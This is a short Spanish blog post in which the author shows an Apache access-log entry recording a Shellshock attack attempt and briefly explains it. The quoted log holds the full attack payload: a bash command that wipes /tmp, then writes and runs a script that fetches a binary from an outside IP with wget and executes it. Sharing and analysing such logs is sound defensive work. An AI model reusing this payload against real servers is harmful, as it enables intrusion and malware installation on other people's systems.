2015-04-13

Logs de apache

La peña no para de querer apropiarse de cosas que no son suyas. Por eso esta entrada que he visto en log e acceso a apache situado en /var/log/apache2:

[12/Apr/2015:12:25:47 +0000] "GET / HTTP/1.1" 200 630 "() { :;
 };
 /bin/bash -c \"rm -rf /tmp/*;
echo wget http://61.160.212.172:911/java -O /tmp/China.Z-ukfl >> /tmp/Run.sh;
echo echo By China.Z >> /tmp/Run.sh;
echo chmod 777 /tmp/China.Z-ukfl >> /tmp/Run.sh;
echo /tmp/China.Z-ukfl >> /tmp/Run.sh;
echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;
/tmp/Run.sh\"" "() { :;
 };
 /bin/bash -c \"rm -rf /tmp/*;
echo wget http://61.160.212.172:911/java -O /tmp/China.Z-ukfl >> /tmp/Run.sh;
echo echo By China.Z >> /tmp/Run.sh;
echo chmod 777 /tmp/China.Z-ukfl >> /tmp/Run.sh;
echo /tmp/China.Z-ukfl >> /tmp/Run.sh;
echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;
/tmp/Run.sh\""

Se bajan un programita lo corren y vete a saber lo que te dejan en el servidor. Parece que buscan una vulnerabilidad de bash de septiembre 2014....conocida como shellshock. mi servidor es más moderno así que no debería tener problemas.


No hay comentarios: